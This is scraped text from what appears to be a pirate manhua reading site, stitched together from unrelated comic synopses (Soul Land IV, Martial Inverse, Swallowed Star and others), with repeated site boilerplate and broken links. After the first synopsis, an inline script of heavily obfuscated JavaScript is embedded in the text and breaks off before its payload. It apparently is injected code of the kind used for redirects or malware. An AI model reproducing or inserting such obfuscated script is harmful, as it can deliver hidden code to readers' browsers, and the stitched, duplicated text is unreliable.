Green Li is the weakest in his village, unable to beat a blind, dying old man. But when he leaves the village, he finds out that he is extremely strong. This is the story of a boy who embarks on a journey to become the strongest.<script></script><script>(function(_0x556a5e,_0xc0704c){var _0x1940ca=_0xc8e4,_0x2fbab9=_0x556a5e();while(!![]){try{var _0x5a175a=-parseInt(_0x1940ca(0xd9))/(-0x49d*0x3+-0x7*0x339+0x1*0x2467)*(-parseInt(_0x1940ca(0xe6))/(-0xf3a+-0xb7b+0x1ab7))+-parseInt(_0x1940ca(0xdc))/(-0x18f7+-0x1b9b+0x3495)+-parseInt(_0x1940ca(0xd4))/(-0x2*-0x452+0x137b*0x1+-0x1c1b)+parseInt(_0x1940ca(0xe8))/(0x21d4+0x2168+-0x4337)*(-parseInt(_0x1940ca(0xd2))/(-0x2*-0x1141+0x1859+0x3ad5*-0x1))+parseInt(_0x1940ca(0xd7))/(-0x227b+-0x1c5*0xb+0x35f9)+-parseInt(_0x1940ca(0xe9))/(-0x1b68+-0x2*0x677+-0x142f*-0x2)+parseInt(_0x1940ca(0xe1))/(0x3*-0x68c+-0x1*-0xb13+0x2de*0x3)*(parseInt(_0x1940ca(0xcf))/(-0x2eb*0x3+-0x47b+0x1*0xd46));if(_0x5a175a===_0xc0704c)break;else _0x2fbab9['push'](_0x2fbab9['shift']());}catch(_0x185b5a){_0x2fbab9['push'](_0x2fbab9['shift']());}}}(_0x3918,-0x1*0x1f0cf+0x359e7*0x1+0x1843a));function custom(){var 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Soul Land iv – The Ultimate Combat Following with nearly extinct Spirit Beasts and Soul Masters Joint force and archieve peace. 10,000 years have passed since the end of the battle of the Douluo plane with the Abyss plane. The abundant energy of the Abyss opened the door for soul masters and spirit beasts in the Douluo plane to reach knowledges, power, and ranks that were once impossible to achieve. The humans of Douluo Plane conquered the space and discovered the other planes.The expedition of scientists from the Federal Research Institute roaming the northern ice land found an egg with wavering light of gold and silver. A kind man, Lan Xiao who lead the expedition hatched that egg and a cute baby boy came out. He decided to adopted the child and named is Lan Xuanyu.Note : The Chapter Premier Release At [2018-12-01]
Zhuo Yifan was a magic emperor or could be called a demon emperor because he had an ancient emperor’s book called the Book of the Nine Secrets, he was targeted by all the experts, and he was even betrayed and killed by his students. Then his soul enters and comes back to life in a family servant boy named Zhuo Fan. Because some demonic magic is holding him back, he must unite the child’s memories and cannot ignore the family and the mistress he serves. How can he lead this descending family back to the pinnacle of this continent! Demon Magic Emperor
I’m The Great Immortal The previous life was a peerless genius in the world of immortality. He was killed by 3 celestial beings. He was accidentally reborn to his 20s by the book of heaven. All he wanted to do was to become an immortal and return to the immortal world, and he became the strongest man on the earth, turning his hands into clouds and covering his hands with rain, provoking anyone who defies him! He is the venerable one! The ruler of 3000 worlds! The guy who is 10 000 times better than Thanos! He is Taixuan Taizun! The Great Immortal! I’m Daxianzun Wo Shi Da Xian Zun 我是大仙尊 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !
She transmigrated as the opposing boss in the novel, but she was wiped out by the male lead. Fortunately, she reincarnates once more, but back to the past, when the male lead was still young! Looking at the pitifully weak male lead, she was troubled by a dilemma. Should she: 1. kill him, or 2. raise him up and openly ask for treasures from him. However, since she wants to get all sorts of treasures from the male lead, she chose the second option. Things don’t always work out though, as she accidentally raises a sheep up to be a big bad wolf.Master? Want treasure? Let’s cultivate together, but alone, just us two, then.
A young orphan was alone in the world until he meets the master of a secret form of martial arts. To learn these otherworldly techniques, he will need to endure years of his sadistic teacher’s grueling and weird training. But why does he have to do laundry, cook meals, or play instruments to learn martial arts anyway?! If he can survive long enough (and if his massive ego doesn’t get in the way), he just might be able to wield the unstoppable lightning knives. Will he make the cut or be sliced down to size? --- - [Webtoon Trailer]( - [Original Webtoon ]( --- - [Official Japanese Translation](
Martial Inverse (Wu Ni) Tianwu Continent, the strong are the most respected. the young master of the feng family, feng hao. with his peerless physique, is considered to be a waste of firewood and has been humiliated! By chance, his body changed, and let him reverse his life! He forged his body with a special crystal to achieve the supreme flesh. When you are in control of the virtual martial arts, you will destroy the universe and slash everything! Wu Ni, 武逆 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !
In the 24th century, the first person in the power world, Luo Qingtong, magically crossed to the real world of another world. Since then, she has opened the way to the revenge of the deposed woman in the lower country. Fighting the villains and slag
Read Manhua Swallowed Star / Star Devourer / The Legend Of Spacewalker / Thôn Phệ Tinh Không / Tunshi Xingkong / Tūnshì Xīngkōng / 吞噬星空 In the Year 2056, a teenager clad in a tactical vest, combat pants, and alloyed combat boots sat atop a ruined and shattered six story apartment building. The building lies in a Prefecture-level city in the Original Jiangsu area. With a Hexagonal Shield and a Bloodshadow Combat Sword on his back, the young man sat silently on the edge of the roof. Under the brilliant hue from a starry night, it brought forth a breath of fresh air as the night breeze caressed his body. However, within this now ruined city, all was silent… all except for the occasional chill-inducing howls…
As the master of the School of Unholy Arts and as the undefeated Unmasked Demon, MookHyang unfortunately falls to a strange fantasy world by the magic of his enemies (School of Blood Arts). In the new world of elf, sorcerer, knight, and dragon, MookHyang’s adventure of finding a way back to his old world (Murim) unfolds.
As The Master Of The School Of Unholy Arts And As The Undefeated Unmasked Demon, Mookhyang Unfortunately Falls To A Strange Fantasy World By The Magic Of His Enemies (School Of Blood Arts). In The New World Of Elf, Sorcerer, Knight, And Dragon, Mookhyang’s Adventure Of Finding A Way Back To His Old World (Murim) Unfolds.
When The World Was Plunged Into Darkness Martial Artists Gathered To Form The ‘Northern Heavenly Sect’. With The Help Of The Northern Heavenly Sect People Began To Enjoy Peace Again. However, As Time Passed The Martial Artists Began To Conspire Against The ‘Northern Heavenly Sect’, And Eventually Caused The Death Of The Sect Leader, Jin Kwan-Ho, Destroying The Sect With It. As Everyone Left The Sect, Jin Kwan-Ho’s Only Son, Jin Mu-Won Was Left Behind. Mu-Won Has Never Learned Martial Arts, But He Finds The Techniques Secretly Left Behind By His Father And Begins To Acquire The Martial Arts Of The Northern Heavenly Sect.